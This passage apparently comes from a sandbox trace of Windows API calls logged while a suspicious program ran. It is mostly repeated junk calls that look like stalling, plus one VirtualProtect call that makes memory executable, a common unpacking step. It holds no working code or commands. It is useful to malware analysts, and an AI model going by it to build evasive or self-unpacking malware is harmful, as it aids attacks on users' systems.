CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0170.600] GetACP () returned 0x4e4 [0170.600] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0170.600] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0170.600] GetACP () returned 0x4e4 [0170.600] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0170.600] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0170.600] GetACP () returned 0x4e4 [0170.600] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0170.600] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0170.600] GetACP () returned 0x4e4 [0170.600] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0170.600] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0170.600] GetACP () returned 0x4e4 [0170.600] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0170.600] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0170.600] GetACP () returned 0x4e4 [0170.601] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0171.268] VirtualProtect (in: lpAddress=0x4e5ac0, dwSize=0xf2eb, flNewProtect=0x40, lpflOldProtect=0x43ad04 | out: lpflOldProtect=0x43ad04*=0x4) returned 1 [0171.268] AddAtomA (lpString=0x0) returned 0x0 [0171.269] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0171.269] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0171.269] AddAtomA (lpString=0x0) returned 0x0 [0171.269] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0171.269] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0171.269] AddAtomA (lpString=0x0) returned 0x0 [0171.269] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0171.269] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0171.269] AddAtomA (lpString=0x0) returned 0x0 [0171.269] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0171.269] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0171.269] AddAtomA (lpString=0x0) returned 0x0 [0171.269] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0171.269] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0171.269] AddAtomA (lpString=0x0) returned 0x0 [0171.269] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0171.270] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0171.270] AddAtomA (lpString=0x0) returned 0x0 [0171.270] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0171.270] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0171.270] AddAtomA (lpString=0x0) returned 0x0 [0171.270] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0171.270] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0171.270] AddAtomA (lpString=0x0) returned 0x0 [0171.270] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0171.270] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0171.270] AddAtomA (lpString=0x0) returned 0x0 [0171.270] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0171.270] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0171.270] AddAtomA (lpString=0x0) returned 0x0 [0171.270] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0171.270] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0171.270] AddAtomA (lpString=0x0) returned 0x0 [0171.270] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0171.270] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0171.270] AddAtomA (lpString=0x0) returned 0x0 [0171.270] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0171.270] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0171.270] AddAtomA (lpString=0x0) returned 0x0 [0171.270] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0171.271] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0171.271] AddAtomA (lpString=0x0) returned 0x0 [0171.271] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0171.271] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0171.271] AddAtomA (lpString=0x0) returned 0x0 [0171.271] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0171.271] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0171.271] AddAtomA (lpString=0x0) returned 0x0 [0171.271] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0171.271] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0171.271] AddAtomA (lpString=0x0) returned 0x0 [0171.271] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0171.271] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0171.271] AddAtomA (lpString=0x0) returned 0x0 [0171.271] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0171.271] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0171.271] AddAtomA (lpString=0x0) returned 0x0 [0171.271] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0171.271] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0171.271] AddAtomA (lpString=0x0) returned 0x0 [0171.271] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0171.271] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0171.271] AddAtomA (lpString=0x0) returned 0x0 [0171.271] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0171.271] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0171.271] AddAtomA (lpString=0x0) returned 0x0 [0171.272] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0171.272] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0171.272] AddAtomA (lpString=0x0) returned 0x0 [0171.272] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0171.272] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0171.272] AddAtomA (lpString=0x0) returned 0x0 [0171.272] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0171.272] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0171.272] AddAtomA (lpString=0x0) returned 0x0 [0171.272] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0171.272] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0171.272] AddAtomA (lpString=0x0) returned 0x0 [0171.272] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0171.272] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0171.272] AddAtomA (lpString=0x0) returned 0x0 [0171.272] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0171.272] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0171.272] AddAtomA (lpString=0x0) returned 0x0 [0171.272] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0171.272] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0171.272] AddAtomA (lpString=0x0) returned 0x0 [0171.272] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0171.272] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0171.272] AddAtomA (lpString=0x0) returned 0x0 [0171.272] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0171.272] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0171.272] AddAtomA (lpString=0x0) returned 0x0 [0171.273] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0171.273] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0171.273] AddAtomA (lpString=0x0) returned 0x0 [0171.273] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0171.273] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0171.273] AddAtomA (lpString=0x0) returned 0x0 [0171.273] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0171.273] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0171.273] AddAtomA (lpString=0x0) returned 0x0 [0171.273] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0171.273] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0171.273] AddAtomA (lpString=0x0) returned 0x0 [0171.273] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0171.273] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0171.273] AddAtomA (lpString=0x0) returned 0x0 [0171.273] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0171.273] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0171.273] AddAtomA (lpString=0x0) returned 0x0 [0171.273] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0171.273] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0171.273] AddAtomA (lpString=0x0) returned 0x0 [0171.273] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0171.273] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0171.273] AddAtomA (lpString=0x0) returned 0x0 [0171.273] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0171.273] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0171.273] AddAtomA (lpString=0x0) returned 0x0 [0171.273] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0171.274] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0171.274] AddAtomA (lpString=0x0) returned 0x0 [0171.274] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0171.274] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0171.274] AddAtomA (lpString=0x0) returned 0x0 [0171.274] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0171.274] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0171.274] AddAtomA (lpString=0x0) returned 0x0 [0171.274] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0171.274] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0171.274] AddAtomA (lpString=0x0) returned 0x0 [0171.274] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0171.274] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0171.274] AddAtomA (lpString=0x0) returned 0x0 [0171.274] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0171.274] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0171.274] AddAtomA (lpString=0x0) returned 0x0 [0171.274] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0171.274] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0171.274] AddAtomA (lpString=0x0) returned 0x0 [0171.274] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0171.274] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0171.274] AddAtomA (lpString=0x0) returned 0x0 [0171.274] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0171.274] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0171.274] AddAtomA (lpString=0x0) returned 0x0 [0171.274] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0171.275] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0171.275] AddAtomA (lpString=0x0) returned 0x0 [0171.275] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0171.275] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0171.275] AddAtomA (lpString=0x0) returned 0x0 [0171.275] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0171.275] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0171.275] AddAtomA (lpString=0x0) returned 0x0 [0171.275] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0171.275] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0171.275] AddAtomA (lpString=0x0) returned 0x0 [0171.275] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0171.275] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0171.275] AddAtomA (lpString=0x0) returned 0x0 [0171.275] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0171.275] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0171.275] AddAtomA (lpString=0x0) returned 0x0 [0171.275] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0171.275] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0171.275] AddAtomA (lpString=0x0) returned 0x0 [0171.275] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0171.275] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0171.275] AddAtomA (lpString=0x0) returned 0x0 [0171.275] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0171.275] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0173.006] AddAtomA (lpString=0x0) returned 0x0 [0173.008] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0173.008] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0173.008] AddAtomA (lpString=0x0) returned 0x0 [0173.008] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0173.008] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0173.008] AddAtomA (lpString=0x0) returned 0x0 [0173.008] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0173.008] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0173.008] AddAtomA (lpString=0x0) returned 0x0 [0173.008] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0173.008] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0173.008] AddAtomA (lpString=0x0) returned 0x0 [0173.008] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0173.019] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0173.019] AddAtomA (lpString=0x0) returned 0x0 [0173.032] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0173.032] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0173.032] AddAtomA (lpString=0x0) returned 0x0 [0173.032] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0173.032] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0173.032] AddAtomA (lpString=0x0) returned 0x0 [0173.051] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0173.051] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0173.051] AddAtomA (lpString=0x0) returned 0x0 [0173.073] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0173.073] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0173.073] AddAtomA (lpString=0x0) returned 0x0 [0173.073] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0173.073] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0173.073] AddAtomA (lpString=0x0) returned 0x0 [0173.075] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0173.075] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0173.075] AddAtomA (lpString=0x0) returned 0x0 [0173.075] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0173.075] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0173.075] AddAtomA (lpString=0x0) returned 0x0 [0173.075] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0173.075] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0173.075] AddAtomA (lpString=0x0) returned 0x0 [0173.075] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0173.092] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0173.092] AddAtomA (lpString=0x0) returned 0x0 [0173.092] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0173.092] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0173.092] AddAtomA (lpString=0x0) returned 0x0 [0173.092] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0173.092] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0173.092] AddAtomA (lpString=0x0) returned 0x0 [0173.172] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0173.172] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0173.172] AddAtomA (lpString=0x0) returned 0x0 [0173.172] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0173.172] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0173.172] AddAtomA (lpString=0x0) returned 0x0 [0173.172] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0173.221] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0173.222] AddAtomA (lpString=0x0) returned 0x0 [0173.222] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0173.276] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0173.276] AddAtomA (lpString=0x0) returned 0x0 [0173.276] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0173.276] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0173.276] AddAtomA (lpString=0x0) returned 0x0 [0173.276] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0173.276] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0173.276] AddAtomA (lpString=0x0) returned 0x0 [0173.276] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0173.276] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0173.276] AddAtomA (lpString=0x0) returned 0x0 [0173.276] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0173.277] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0173.277] AddAtomA (lpString=0x0) returned 0x0 [0173.277] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0173.277] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0173.277] AddAtomA (lpString=0x0) returned 0x0 [0173.277] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0173.277] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0173.277] AddAtomA (lpString=0x0) returned 0x0 [0173.277] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0173.277] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0173.277] AddAtomA (lpString=0x0) returned 0x0 [0173.277] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0173.277] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0173.277] AddAtomA (lpString=0x0) returned 0x0 [0173.277] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0173.277] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0173.277] AddAtomA (lpString=0x0) returned 0x0 [0173.277] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0173.277] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0173.277] AddAtomA (lpString=0x0) returned 0x0 [0173.277] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0173.277] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0173.278] AddAtomA (lpString=0x0) returned 0x0 [0173.278] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0173.278] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0173.278] AddAtomA (lpString=0x0) returned 0x0 [0173.278] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0173.278] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0173.278] AddAtomA (lpString=0x0) returned 0x0 [0173.278] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0173.278] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0173.278] AddAtomA (lpString=0x0) returned 0x0 [0173.278] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0173.278] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0173.278] AddAtomA (lpString=0x0) returned 0x0 [0173.278] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0173.278] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0173.278] AddAtomA (lpString=0x0) returned 0x0 [0173.278] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0173.278] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0173.278] AddAtomA (lpString=0x0) returned 0x0 [0173.278] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0173.279] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0173.279] AddAtomA (lpString=0x0) returned 0x0 [0173.279] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0173.279] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0173.279] AddAtomA (lpString=0x0) returned 0x0 [0173.279] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0173.279] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0173.279] AddAtomA (lpString=0x0) returned 0x0 [0173.279] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0173.279] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0173.279] AddAtomA (lpString=0x0) returned 0x0 [0173.279] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0173.279] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0173.279] AddAtomA (lpString=0x0) returned 0x0 [0173.279] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0173.279] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0173.279] AddAtomA (lpString=0x0) returned 0x0 [0173.279] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0173.280] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0173.280] AddAtomA (lpString=0x0) returned 0x0 [0173.280] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0173.280] 